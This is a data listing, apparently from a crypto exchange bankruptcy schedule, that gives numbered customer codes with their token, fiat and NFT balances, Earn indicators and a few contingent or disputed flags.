| 07383783 | | CUSDT[1], DOGE[814.82598553], ETH[.00628637], ETHW[.00620429], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07383784 | | BTC[0], USD[12886.66], WBTC[0] | | |
| 07383785 | | CUSDT[4], DOGE[318.31034064], LINK[1.1012145], USD[0.00] | | |
| 07383786 | | USD[0.00] | | |
| 07383788 | | SOL[.91327585], SUSHI[.00000001], USD[0.00] | | |
| 07383790 | | CUSDT[3], USD[0.67] | | |
| 07383793 | | USD[10.00] | | |
| 07383794 | | CUSDT[1], ETH[.00302678], ETHW[.00302678], USD[0.00] | | |
| 07383795 | | USD[10.00] | | |
| 07383796 | | BTC[.00010731], DOGE[177.12166024], USD[0.00] | | |
| 07383797 | | CUSDT[1], DOGE[1], SOL[32.68045336], USD[0.00] | Yes | |
| 07383799 | | CUSDT[1], DOGE[.0077763], USD[0.00] | | |
| 07383800 | | BRZ[1], DOGE[.81043217], UNI[1], USD[2.41] | | |
| 07383802 | | BRZ[1], BTC[.02497171], CUSDT[1], DOGE[3792.44731784], LTC[.57512615], SUSHI[.72733686], TRX[1], USD[0.00] | Yes | |
| 07383803 | | BAT[23.91504084], USD[0.00] | Yes | |
| 07383805 | | AVAX[.06624145], BTC[.0000165], DOGE[.9402], LINK[.008], USD[0.45], USDT[0] | | |
| 07383807 | | BRZ[2], CUSDT[1], DOGE[13077.06177888], ETH[3.69376631], ETHW[3.69376631], GRT[1], TRX[2], USD[0.00] | | |
| 07383808 | | ETH[.00568196], ETHW[.00561351], USD[0.00] | Yes | |
| 07383809 | | CUSDT[1], DOGE[15.48331773], USD[0.00] | Yes | |
| 07383811 | | BAT[0.00001155], DOGE[0.00001651], TRX[213.46537510], USD[0.00] | | |
| 07383812 | | DOGE[142.06357572], USD[0.00] | | |
| 07383813 | | AAVE[0], AUD[0.00], AVAX[0], BCH[0], BRZ[0], BTC[0], CAD[0.00], CUSDT[0], DAI[0], DOGE[0], ETH[0], EUR[0.00], GBP[0.00], GRT[0], LINK[0], LTC[0], MATIC[0], MKR[0], NFT (294027315985498534/2974 Floyd Norman - OKC 1-0104)[1], NFT (295759463033089039/2974 Floyd Norman - CLE 2-0015)[1], NFT (295939069187707612/2974 Floyd Norman - CLE 2-0159)[1], NFT (296862528658431113/2974 Floyd Norman - OKC 4-0049)[1], NFT (299177712909263621/The 2974 Collection #1263)[1], NFT (301615332762800456/Birthday Cake #2027)[1], NFT (304515751625149837/2974 Floyd Norman - CLE 2-0248)[1], NFT (309663096033324826/Birthday Cake #1263)[1], NFT (310631656179544823/2974 Floyd Norman - CLE 4-0180)[1], NFT (313788203842682399/2974 Floyd Norman - OKC 6-0221)[1], NFT (315345526476993860/2974 Floyd Norman - OKC 1-0003)[1], NFT (317123162307907215/2974 Floyd Norman - CLE 5-0171)[1], NFT (324508938336294575/2974 Floyd Norman - CLE 2-0238)[1], NFT (327354367205804795/2974 Floyd Norman - CLE 2-0067)[1], NFT (335804468664690385/2974 Floyd Norman - CLE 2-0138)[1], NFT (336463573048993065/2974 Floyd Norman - OKC 3-0007)[1], NFT (340837081827659268/2974 Floyd Norman - OKC 6-0184)[1], NFT (341791385047035754/2974 Floyd Norman - OKC 2-0018)[1], NFT (344335298782641398/2974 Floyd Norman - CLE 3-0176)[1], NFT (348082881365682779/The 2974 Collection #0938)[1], NFT (352866573042879901/2974 Floyd Norman - CLE 4-0066)[1], NFT (353344202717373168/2974 Floyd Norman - OKC 3-0147)[1], NFT (356208825268599119/2974 Floyd Norman - OKC 1-0134)[1], NFT (357677645582471541/Birthday Cake #0698)[1], NFT (364398136382494791/2974 Floyd Norman - OKC 2-0062)[1], NFT (369284233104672930/2974 Floyd Norman - CLE 5-0074)[1], NFT (372366076821251573/2974 Floyd Norman - OKC 4-0117)[1], NFT (374347016680543799/The 2974 Collection #2027)[1], NFT (383761706840033548/Birthday Cake #0938)[1], NFT (385437053845255863/2974 Floyd Norman - CLE 2-0149)[1], NFT (389851990156638418/2974 Floyd Norman - CLE 1-0042)[1], NFT (391568538404497330/2974 Floyd Norman - CLE 5-0258)[1], NFT (392583103677425034/2974 Floyd Norman - CLE 6-0241)[1], NFT (394524416599537920/2974 Floyd Norman - CLE 5-0038)[1], NFT (396252117334767311/2974 Floyd Norman - CLE 3-0213)[1], NFT (398452585915132431/2974 Floyd Norman - OKC 4-0141)[1], NFT (407118047348092378/2974 Floyd Norman - OKC 5-0261)[1], NFT (410146916260152693/2974 Floyd Norman - OKC 6-0135)[1], NFT (410352658066435833/2974 Floyd Norman - OKC 2-0112)[1], NFT (412485214036406729/The 2974 Collection #1942)[1], NFT (416389983702924610/2974 Floyd Norman - CLE 2-0135)[1], NFT (419247743712756873/2974 Floyd Norman - CLE 2-0006)[1], NFT (425508656458930417/2974 Floyd Norman - OKC 5-0167)[1], NFT (429075469615968798/2974 Floyd Norman - CLE 5-0148)[1], NFT (432277804031309964/2974 Floyd Norman - CLE 2-0089)[1], NFT (434225596422386843/2974 Floyd Norman - CLE 2-0128)[1], NFT (440215199261015385/2974 Floyd Norman - OKC 1-0020)[1], NFT (442602600531300393/2974 Floyd Norman - OKC 2-0017)[1], NFT (443492820077186066/2974 Floyd Norman - OKC 3-0258)[1], NFT (443722910898857834/The 2974 Collection #1573)[1], NFT (444398991389539836/2974 Floyd Norman - CLE 5-0155)[1], NFT (444994226615889221/2974 Floyd Norman - OKC 3-0206)[1], NFT (448863861443322657/2974 Floyd Norman - OKC 6-0205)[1], NFT (478408622212443973/Birthday Cake #1942)[1], NFT (485112024603335441/2974 Floyd Norman - CLE 1-0227)[1], NFT (485424500748477268/2974 Floyd Norman - OKC 6-0049)[1], NFT (485564561548938799/2974 Floyd Norman - OKC 3-0082)[1], NFT (487231629718837338/2974 Floyd Norman - CLE 6-0229)[1], NFT (492739804764436906/Entrance Voucher #29705)[1], NFT (499613948305816296/2974 Floyd Norman - CLE 2-0088)[1], NFT (503657656923265195/2974 Floyd Norman - CLE 2-0164)[1], NFT (506955310831667884/2974 Floyd Norman - OKC 4-0080)[1], NFT (510119978564920672/2974 Floyd Norman - CLE 2-0219)[1], NFT (517272148900714019/2974 Floyd Norman - CLE 1-0019)[1], NFT (520696619084470861/2974 Floyd Norman - CLE 4-0228)[1], NFT (523693111706757800/2974 Floyd Norman - CLE 2-0074)[1], NFT (525205244391509934/2974 Floyd Norman - CLE 5-0259)[1], NFT (525774927528362624/2974 Floyd Norman - CLE 5-0079)[1], NFT (533365349491067180/2974 Floyd Norman - OKC 2-0158)[1], NFT (533793860497444980/2974 Floyd Norman - OKC 6-0003)[1], NFT (535949868394322182/2974 Floyd Norman - CLE 5-0165)[1], NFT (539139127126726667/2974 Floyd Norman - CLE 2-0041)[1], NFT (540793936313920817/2974 Floyd Norman - CLE 5-0105)[1], NFT (545576158174650908/2974 Floyd Norman - OKC 6-0101)[1], NFT (547217455444059121/2974 Floyd Norman - CLE 5-0264)[1], NFT (547605366494379649/2974 Floyd Norman - OKC 6-0088)[1], NFT (548210187137819970/2974 Floyd Norman - CLE 6-0015)[1], NFT (549293070038187880/2974 Floyd Norman - OKC 2-0052)[1], NFT (551278494985262909/The 2974 Collection #0698)[1], NFT (557030817962634812/Birthday Cake #1573)[1], NFT (560171362591147658/2974 Floyd Norman - OKC 4-0125)[1], NFT (561148999812039528/2974 Floyd Norman - CLE 2-0155)[1], NFT (561296801274526476/2974 Floyd Norman - CLE 2-0150)[1], NFT (562067142055544322/2974 Floyd Norman - CLE 1-0097)[1], NFT (576196518951748900/2974 Floyd Norman - CLE 6-0145)[1], PAXG[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0], WBTC[0], YFI[0] | | |
| 07383814 | | USD[10.00] | | |
| 07383815 | | USD[10.00] | | |
| 07383816 | | USD[0.00] | | |
| 07383817 | | USD[0.00] | | |
| 07383819 | | USD[10.00] | | |
| 07383820 | | SOL[1.06603071], USD[0.00] | | |
| 07383821 | | USD[10.00] | | |
| 07383822 | | BTC[0.07855683], USD[2523.42] | | |
| 07383823 | | USD[10.00] | | |
| 07383824 | | BRZ[1], CUSDT[4], DOGE[3], SOL[.09188766], TRX[69.72715415], UNI[.00001592], USD[0.00] | | |
| 07383825 | | BTC[.00096534] | | |
| 07383826 | | BAT[2.012137], BRZ[4], BTC[.08633525], DOGE[7.00217705], LTC[49.44333697], MATIC[0], NFT (435922568170061512/AI-generated city #5)[1], NFT (547347722810925715/Surrealisart #2)[1], SHIB[5830483.43177863], SOL[112.27841942], TRX[8], UNI[1.04799421], USDt-1000.00], USDT[0] | Yes | |
| 07383827 | | USD[10.00] | | |
| 07383828 | | USD[0.00] | Yes | |
| 07383829 | | DOGE[1], USD[0.00] | Yes | |
| 07383830 | | USD[10.00] | | |
| 07383834 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07383835 | | USD[0.00] | | |
| 07383837 | | USD[10.00] | | |
| 07383838 | | TRX[232.28777363], USD[0.00] | Yes | |
| 07383839 | | USD[10.00] | | |
| 07383840 | | USD[10.00] | | |
| 07383843 | | DOGE[0], ETH[0.00031216], ETHW[0.00031216], SUSHI[0], UNI[0] | | |
| 07383844 | | USD[10.00] | | |
| 07383845 | | USD[10.00] | | |
| 07383847 | | TRX[232.76477608], USD[0.00] | Yes | |
| 07383848 | | DOGE[29.40397265], USD[0.00] | | |
| 07383849 | | DOGE[25.71056387], USD[0.00] | | |
| 07383850 | | BAT[1], DOGE[1348.04132695], USD[0.00] | | |
| 07383851 | | USD[11.08] | Yes | |
| 07383853 | | BTC[0.00003730], DOGE[.566], ETH[0], LTC[.00265184], SOL[.0008], USD[0.00], USDT[597.37047165] | | |
| 07383854 | | BF_POINT[300], CUSDT[13], SUSHI[0], USD[0.00] | Yes | |
| 07383855 | | USD[10.00] | | |
| 07383856 | | CUSDT[1], DOGE[27580.46681535], TRX[1], USD[20.00] | | |
| 07383857 | | BTC[0], CUSDT[1], DOGE[0], USD[0.00] | | |
| 07383858 | | USD[10.00] | | |
| 07383859 | | BRZ[1], CUSDT[2], TRX[2], USD[190.56] | Yes | |
| 07383860 | | CUSDT[3], DOGE[2], LINK[.00217849], TRX[.98272531], USD[0.63] | | |
| 07383861 | | CUSDT[2], USD[0.01] | | |
| 07383865 | | USD[0.00], USDT[273.52667155] | | |
| 07383866 | | CUSDT[2], SHIB[1], TRX[1], USD[0.26] | | |
| 07383867 | | DOGE[0], ETH[0], ETHW[2.07065299], MATIC[0], NFT [425372462305861363/Imola Ticket Stub #909][1], NFT [532269625882549026/Romeo #951][1], SOL[0], USD[0.00] | | |
| 07383869 | | USD[0.00] | | |
| 07383870 | | USD[10.00] | | |
| 07383871 | | BRZ[1], CUSDT[2], DOGE[1168.33631995], TRX[2], USD[0.00] | Yes | |
| 07383872 | | USD[10.00] | | |
| 07383873 | | USD[10.00] | | |
| 07383875 | | USD[10.00] | | |
| 07383877 | | CUSDT[11], DOGE[187.09207472], USD[0.61] | | |
| 07383878 | | DOGE[137.36469405], USD[0.00] | | |
| 07383881 | | BAT[1], CUSDT[10], DOGE[1439.95745319], USD[0.00], USDT[1] | | |
| 07383882 | | BF_POINT[100], GBP[0.00], USD[5.03] | Yes | |
| 07383883 | | USD[0.00] | | |
| 07383884 | | TRX[43008.32379572], USD[0.00] | Yes | |
| 07383886 | | USD[0.01] | | |
| 07383887 | | BRZ[5], BTC[0], CUSDT[6], DOGE[4], ETH[0], GRT[0], SOL[0], TRX[3], USD[0.00], USDT[0.00000218] | | |
| 07383888 | | USD[10.00] | | |
| 07383889 | | CUSDT[1], DOGE[4011.43182515], USD[0.01] | | |
| 07383890 | | USD[10.00] | | |
| 07383891 | | CUSDT[2], USD[0.01] | | |
| 07383892 | | CUSDT[1], USD[0.00] | | |
| 07383893 | | BAT[6.21149848], BF_POINT[300], BRZ[7.41163354], BTC[.00009], CUSDT[8], DOGE[26.23988866], ETH[0], ETHW[7.98120753], GRT[70.54158445], LINK[1.06986408], MATIC[1.00273419], SHIB[6], SOL[0], SUSHI[1.06988887], TRX[16.56628412], USD[11.04], USDT[1.04178208] | Yes | |
| 07383894 | | CUSDT[4], SOL[0], TRX[1], UNI[0], USD[0.00] | | |
| 07383896 | | USD[10.00] | | |
| 07383897 | | CUSDT[2], DOGE[2314.62483029], USD[0.00], USDT[0] | | |
| 07383898 | | MATIC[7.25793575], USD[0.00] | Yes | |
| 07383899 | | USD[10.00] | | |
| 07383900 | | DOGE[123.50489682], USD[0.00] | | |
| 07383901 | | SOL[0] | | |
| 07383902 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07383903 | | DOGE[130.80615707], ETH[.0027566], ETHW[.0027566], TRX[1], USD[5.01] | | |
| 07383904 | | TRX[1], USD[0.00] | | |
| 07383905 | | USD[10.00] | | |
| 07383906 | | USD[10.00] | | |
| 07383907 | | TRX[.00636011], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07383908 | | USD[10.00] | | |
| 07383909 | | DOGE[0], TRX[1], USD[0.01] | | |
| 07383910 | | USD[10.00] | | |
| 07383911 | | ETH[.00415151], ETHW[.00415151], USD[2.50] | | |
| 07383912 | | USD[20.00] | | |
| 07383913 | | USD[0.01] | | |
| 07383914 | | USD[10.00] | | |
| 07383915 | | DOGE[.642], MATIC[1.55], SHIB[100], TRX[.77557], USD[0.00] | | |
| 07383916 | | USD[10.00] | | |
| 07383917 | | CUSDT[2], USD[25.45] | | |
| 07383919 | | DOGE[.2], ETH[.000099], ETHW[.000099], LTC[.00289], SHIB[35186.85920639], SOL[.00000001], USD[0.28] | | |
| 07383920 | | BRZ[30.91688564], BTC[.00000062], CUSDT[303.96958062], DOGE[1], LINK[2.32956136], USD[0.39] | Yes | |
| 07383921 | | USD[10.00] | | |
| 07383922 | | USD[10.00] | | |
| 07383923 | | NFT (427203866557228121/Coachella x FTX Weekend 1 #4532)[1], USD[10.00] | | |
| 07383924 | | USD[10.00] | | |
| 07383927 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07383931 | | USD[10.00] | | |
| 07383934 | | USD[0.00] | | |
| 07383935 | | BTC[0], USD[0.00] | | |
| 07383936 | | USD[10.00] | | |
| 07383937 | | DOGE[1], USD[9.92] | | |
| 07383938 | | DOGE[123.44561905], USD[0.00] | | |
| 07383939 | | CUSDT[11], DOGE[1], TRX[2], USD[0.00] | | |
| 07383940 | | ETH[.00000001], ETHW[0], SHIB[1699900], SOL[.92200414], USD[0.10] | | |
| 07383941 | | DOGE[0], GRT[0], SOL[0], SUSHI[0], USD[0.00], USDT[0] | Yes | |
| 07383943 | | CUSDT[237.63351904], DOGE[390.19840684], TRX[202.67413734], USD[0.00] | | |
| 07383944 | | BAT[8578.23565323], CUSDT[6], DOGE[3], ETH[.00004756], ETHW[.00004756], GRT[1], SHIB[34438357.59437417], SUSHI[.00002785], TRX[6.00548375], USD[0.10], USDT[1.06496325] | Yes | |
| 07383945 | | USD[10.00] | | |
| 07383948 | | USD[0.00] | | |
| 07383950 | | USD[10.00] | | |
| 07383951 | | DOGE[1], TRX[1], USD[0.01] | Yes | |
| 07383952 | | USD[10.00] | | |
| 07383953 | Contingent, Disputed | DOGE[171.50811199], USD[0.00] | | |
| 07383954 | | USD[10.00] | | |
| 07383955 | | USD[210.00] | | |
| 07383959 | | SUSHI[32.84733163], TRX[0] | | |
| 07383961 | | USD[10.00] | | |
| 07383962 | | BRZ[57.87068517], TRX[1], USD[0.00] | | |
| 07383963 | | USD[10.00] | | |
| 07383964 | | USD[10.00] | | |
| 07383966 | | USD[10.00] | | |
| 07383969 | | CUSDT[1], DOGE[76.63209268], SUSHI[.40774163], TRX[100.03716889], USD[0.00] | | |
| 07383970 | | USD[10.00] | | |
| 07383971 | | USD[0.00], USDT[0.00000001] | | |
| 07383972 | | BTC[.0041951], DOGE[.84], ETH[.012987], ETHW[.012987], SOL[.31], USD[4.17] | | |
| 07383974 | | BTC[0.00004281], DOGE[.0803], MATIC[6.5971], SOL[.0017374], SUSHI[.169], USD[21226.80] | | |
| 07383976 | | CUSDT[2], TRX[2], USD[0.00], USDT[1] | | |
| 07383979 | | CUSDT[4], DOGE[2241.33612885], TRX[4], USD[0.00] | | |
| 07383980 | | CUSDT[2], DOGE[29.80716651], LTC[.00004485], MATIC[.00273746], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07383981 | | DOGE[154.00757855], SOL[.0484222], TRX[6.31076076], USD[0.00] | Yes | |
| 07383983 | | DOGE[0], ETH[0], LTC[0], SOL[0], USDT[0.00000002] | | |
| 07383984 | | CUSDT[1], USD[0.00] | Yes | |
| 07383985 | | USD[10.00] | | |
| 07383986 | | TRX[.011157], USD[3.99], USDT[0.00000001] | | |
| 07383988 | | USD[10.00] | | |
| 07383989 | | BCH[.03185728], BTC[.00339565], DOGE[1014.19658242], ETH[.03204961], ETHW[.0316526], LINK[3.55849498], LTC[1.21327308], SHIB[147952.67596266], SOL[1.32226112], TRX[1], UNI[3.16429834], USD[0.00] | Yes | |
| 07383990 | | BAT[1], BRZ[4], DOGE[3], ETH[.00000001], NFT (311904714906912119/Sigma Shark #522)[1], NFT (435939683541381370/World of Pixel #5)[1], NFT (441903696950727683/Entrance Voucher #2878)[1], NFT (448459991797540139/Vox Robo #12)[1], SHIB[33], UNI[.00000003], USD[0.00], USDT[0] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07383991 | | USD[10.00] | | |
| 07383992 | | BTC[.00014685], DOGE[1], USD[0.00] | | |
| 07383995 | | USD[10.00] | | |
| 07383996 | | USD[10.00] | | |
| 07383999 | | BTC[0], DOGE[0], ETH[0], LINK[0], SUSHI[0], TRX[0], UNI[0], USD[0.03] | | |
| 07384000 | | BCH[0], CUSDT[2], DOGE[0], USD[50.51] | | |
| 07384001 | | BCH[0], CUSDT[1], DOGE[2.00052037], TRX[4.00002919], USD[0.00] | | |
| 07384002 | | BAT[0], BTC[0], CUSDT[0], DOGE[0], ETH[0], ETHW[0], GRT[0], SOL[0], TRX[0], USD[0.00] | | |
| 07384003 | | ETH[.000516], ETHW[.000516], NFT (50740270210926448/Sigma Shark #1001)[1], SOL[201.8216], USD[0.24] | | |
| 07384004 | | CUSDT[1], USD[0.00], YFI[.00021282] | | |
| 07384006 | | BTC[.00016782], CUSDT[6], DOGE[1488.07417809], TRX[2], USD[0.00] | | |
| 07384007 | | USD[10.00] | | |
| 07384008 | | USD[10.00] | | |
| 07384009 | | SUSHI[8.71394323] | | |
| 07384010 | | BAT[13.03386923], USD[0.00] | | |
| 07384011 | | DOGE[5374.88273633], USD[0.00] | | |
| 07384014 | | USD[10.00] | | |
| 07384015 | | USD[10.00] | | |
| 07384016 | | USD[10.00] | | |
| 07384017 | | DOGE[138.84818088], USD[0.00] | Yes | |
| 07384018 | | USD[0.01] | | |
| 07384020 | | USD[10.00] | | |
| 07384022 | | USD[10.00] | | |
| 07384024 | | GRT[10.03179909], USD[0.00] | | |
| 07384025 | | BRZ[1], DOGE[1], TRX[3], USD[0.40] | | |
| 07384026 | | CUSDT[6], DOGE[3], USD[0.00] | | |
| 07384028 | | TRX[1], USD[0.01] | | |
| 07384029 | | USD[10.00] | | |
| 07384030 | | USD[0.00] | | |
| 07384032 | | BTC[.00003884], USD[0.62], USDT[0.91760000] | | |
| 07384036 | | USD[10.00] | | |
| 07384038 | | DOGE[163.29740177], SHIB[181620.05085361], USD[0.00] | | |
| 07384042 | | ETH[0] | | |
| 07384043 | | CUSDT[4], DOGE[.56149214], TRX[.47565828], USD[43.93] | | |
| 07384044 | | USD[0.00] | | |
| 07384045 | | BRZ[223.9752131], CUSDT[1], DOGE[17082.28555425], TRX[5], USD[0.00], USDT[0.00000400] | Yes | |
| 07384047 | | CUSDT[3], TRX[192.29802397], USD[0.00] | | |
| 07384050 | | TRX[.00000709], USD[10.00] | | |
| 07384051 | | USD[10.00] | | |
| 07384052 | | USD[10.00] | | |
| 07384053 | | USD[11.08] | Yes | |
| 07384055 | | CUSDT[1], DOGE[0], USD[0.00] | | |
| 07384056 | | BTC[.0001741], DOGE[93.87011002], TRX[1], USD[0.00] | Yes | |
| 07384057 | | USD[10.00] | | |
| 07384058 | | TRX[219.28862769], USD[0.00] | | |
| 07384061 | | LTC[.05867522], USD[0.00] | | |
| 07384063 | | USD[10.00] | | |
| 07384064 | | BTC[.00022449], USD[0.00] | | |
| 07384065 | | BAT[1], DOGE[1.00515078], TRX[42373.91555521], USD[2008.61] | | |
| 07384067 | | SHIB[18585.75294117], USD[0.00] | Yes | |
| 07384069 | | USD[7.83] | | |
| 07384071 | | USD[10.00] | | |
| 07384072 | | BAT[66.50036079], CUSDT[2], DOGE[27940.86669994], SUSHI[1], TRX[2], USD[0.00], USDT[2] | | |
| 07384073 | | USD[10.00] | | |
| 07384074 | | USD[0.00] | | |
| 07384076 | | CUSDT[1], DOGE[.00001201], TRX[1], USD[0.00] | | |
| 07384077 | | USD[10.00] | | |
| 07384078 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07384080 | | DOGE[1445.25859883], USD[0.01] | Yes | |
| 07384082 | | USD[0.01], USDT[0] | | |
| 07384083 | | CUSDT[4], DOGE[214.19823359], USD[0.00] | Yes | |
| 07384085 | | USD[10.92] | Yes | |
| 07384087 | | USD[10.00] | | |
| 07384088 | | CUSDT[4], DOGE[358.29789663], USD[0.00] | Yes | |
| 07384090 | | USD[10.00] | | |
| 07384092 | | USD[10.00] | | |
| 07384093 | | BTC[0.00005442], ETH[.223], ETHW[.223], LTC[.0044], USD[90.06] | | |
| 07384094 | | BRZ[3], CUSDT[19], ETHW[.16105074], GRT[1], SHIB[1], TRX[9], USD[1033.95], USDT[1] | | |
| 07384095 | | TRX[1], USD[0.00] | | |
| 07384096 | | DOGE[0], TRX[.08425701], USD[0.00], USDT[0] | Yes | |
| 07384098 | | CUSDT[5], DOGE[1], GRT[39.974581], SOL[1.50429033], TRX[992.50089787], USD[0.00] | Yes | |
| 07384100 | | CUSDT[2], TRX[1], USD[0.00] | | |
| 07384101 | | ETH[.00483768], ETHW[.00483768], USD[0.00] | | |
| 07384102 | | DOGE[1], TRX[0], USD[0.00] | | |
| 07384103 | | DOGE[21.50015765], SUSHI[1.60415159], USD[0.19] | | |
| 07384105 | | BTC[0], DOGE[3], GRT[0], MATIC[41.64310802], SHIB[2.00002876], SOL[2.74379027], TRX[2], USD[0.00], USDT[0] | Yes | |
| 07384107 | | USD[10.00] | | |
| 07384108 | | BRZ[1], CUSDT[1], DOGE[2], TRX[144.75990957], USD[5.29] | | |
| 07384109 | | USD[10.00] | | |
| 07384111 | | DOGE[137.48667754], USD[0.00] | | |
| 07384113 | | BTC[.0001986], USD[0.00] | | |
| 07384114 | | USD[10.00] | | |
| 07384115 | | USD[10.00] | | |
| 07384117 | | USD[0.00] | | |
| 07384118 | | USD[10.00] | | |
| 07384119 | | USD[10.00] | | |
| 07384121 | | AUD[0.00], BRZ[2], DOGE[893.11261694], ETH[0], USD[0.06] | | |
| 07384122 | | USD[10.00] | | |
| 07384123 | | USD[0.00] | | |
| 07384124 | | ETH[.00000004], ETHW[.00000004], SHIB[5], SOL[.00008348], TRX[1], USD[85.62], USDT[0.00007941] | Yes | |
| 07384125 | Contingent, Disputed | BTC[0], ETH[0], USD[6503.63] | | |
| 07384127 | | TRX[31.33596041], USD[5.00] | | |
| 07384128 | | CUSDT[1], USD[0.00] | Yes | |
| 07384129 | | USD[10.00] | | |
| 07384133 | | USD[10.00] | | |
| 07384134 | | USD[10.00] | | |
| 07384135 | | NFT (319119654455963585/Beasts #953)[1], NFT (326492658688403850/Beasts #492)[1], NFT (389159181482912989/Reflection '19 #29)[1], NFT (392369848683054263/Colossal Cacti #764)[1], NFT (417998980437912124/Reflection '18 #100)[1], NFT (430082677493697113/Reflection '07 #72)[1], NFT (431256339710652070/Reflection '19 #61)[1], NFT (458785876773584391/Reflection '19 #12)[1], NFT (492964589294806297/Reflection '19 #88)[1], NFT (496108819684741919/Golden Hill #80)[1], NFT (522755319133775411/Sun Set #210)[1], NFT (537176690132277530/Ferris From Afar #724)[1], USD[25.58], USDT[0] | | |
| 07384136 | | AAVE[1.26570848], BTC[.00230256], CUSDT[695.97621104], DOGE[835.42735391], ETH[.0235805], ETHW[.0235805], LTC[0.19490997], PAXG[.01284319], SHIB[1681503.40445456], SOL[.13626171], SUSHI[18.16828110], TRX[199.89074698], UNI[1.11211274], USD[8.86] | | |
| 07384137 | | USD[0.00] | | |
| 07384138 | | USD[10.00] | | |
| 07384139 | | USD[10.00] | | |
| 07384140 | | SGD[13.23], USD[0.00] | | |
| 07384141 | | DOGE[24.39359528], USD[0.00] | Yes | |
| 07384142 | | BTC[0.07208432], DOGE[11.988], ETH[.00033381], ETHW[.40933381], USD[0.31] | | |
| 07384144 | | DOGE[3.94427014], USD[9.00] | | |
| 07384146 | | BRZ[1], BTC[.00686198], CUSDT[4], DOGE[172.49428303], ETH[.27085852], ETHW[.23356278], KSHIB[472.34637737], SHIB[7], TRX[3], USD[0.00] | Yes | |
| 07384148 | | BAT[0], BCH[0], BTC[0], UNI[0], USD[0.00], USDT[0.00000001] | | |
| 07384149 | | CUSDT[2], DOGE[2], USD[0.00] | | |
| 07384150 | | BRZ[1], USD[0.00] | | |
| 07384151 | | USD[10.00] | | |
| 07384152 | | DOGE[131.42452355], USD[0.00] | | |
| 07384153 | | USD[10.00] | | |
| 07384154 | | USD[0.00] | Yes | |
| 07384155 | | CUSDT[3], DOGE[103.30028631], TRX[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07384156 | | USD[10.00] | | |
| 07384157 | | BTC[0.00000002], ETH[0], LTC[0], PAXG[0], USD[0.00], USDT[0.00000001] | | |
| 07384159 | | DOGE[31.48843336], USD[0.00] | | |
| 07384160 | | CUSDT[3], USD[0.00] | | |
| 07384161 | | DOGE[0.94137108], USD[0.00] | | |
| 07384162 | | BRZ[2], SHIB[2], USD[0.00], USDT[0] | Yes | |
| 07384163 | | CUSDT[3], TRX[121.60532475], USD[0.00] | | |
| 07384165 | | USD[10.00] | | |
| 07384166 | | CUSDT[2], DOGE[256.65310404], TRX[1], USD[0.00] | | |
| 07384167 | | DOGE[40.13554254], USD[0.00] | | |
| 07384169 | | USD[10.00] | | |
| 07384170 | | USD[10.00] | | |
| 07384171 | | USD[10.00] | | |
| 07384172 | | USD[10.69] | Yes | |
| 07384173 | | USD[10.00] | | |
| 07384174 | | USD[10.00] | | |
| 07384175 | | USD[10.00] | | |
| 07384176 | | USD[10.00] | | |
| 07384177 | | CUSDT[1], DOGE[2], TRX[1], USD[0.00] | | |
| 07384178 | | DOGE[140.84433644], USD[0.00] | | |
| 07384179 | | USD[0.00] | | |
| 07384181 | | BRZ[1], TRX[1], USD[0.00] | | |
| 07384182 | | DOGE[41.61152279], USD[0.00] | | |
| 07384183 | | USD[10.00] | | |
| 07384184 | | USD[10.00] | | |
| 07384186 | | USD[0.00], USDT[9.9470557] | | |
| 07384187 | | USD[10.00] | | |
| 07384188 | | CUSDT[1], DOGE[257.20641295], GRT[100.00143223], USD[0.00] | | |
| 07384189 | | USD[20.00] | | |
| 07384191 | Contingent, Disputed | CUSDT[1], DOGE[0], ETH[0], USD[0.01] | | |
| 07384192 | | CUSDT[3], DOGE[.0003539], TRX[1], USD[0.39] | Yes | |
| 07384193 | | BTC[0], CUSDT[0], DAI[0], DOGE[0], LINK[0], LTC[0], TRX[0], USD[0.00], USDT[0] | | |
| 07384195 | | USD[0.00], USDT[0] | | |
| 07384196 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07384197 | | TRX[132.47399244], USD[0.00] | | |
| 07384198 | | BRZ[1], DOGE[1240.00770788], USD[10.00] | | |
| 07384200 | | USD[10.00] | | |
| 07384201 | | SUSHI[15.9392], USD[2.49] | | |
| 07384202 | | BAT[1.86595683], USD[0.00] | | |
| 07384203 | | USD[10.00] | | |
| 07384204 | | USD[10.00] | | |
| 07384205 | | CUSDT[2], TRX[1], USD[89.11] | | |
| 07384206 | | BTC[.00016364], USD[0.00] | | |
| 07384207 | | SOL[0], USD[0.00], USDT[0] | | |
| 07384208 | Contingent, Disputed | USD[0.00] | | |
| 07384210 | | USD[10.00] | | |
| 07384212 | | LTC[.04318726], USD[0.00] | | |
| 07384213 | | BTC[.00015695], DOGE[213.64119072], USD[0.00] | | |
| 07384214 | | CUSDT[2], DOGE[743.28623124], SUSHI[.00002485], USD[1.70] | | |
| 07384215 | | BTC[.00021104], USD[0.00] | | |
| 07384217 | | TRX[184.74964116], USD[0.00] | | |
| 07384220 | | USD[0.01], USDT[0] | Yes | |
| 07384221 | | USD[10.00] | | |
| 07384223 | | BTC[.00021413], USD[0.00] | | |
| 07384225 | | CUSDT[1], USD[0.00], USDT[1] | | |
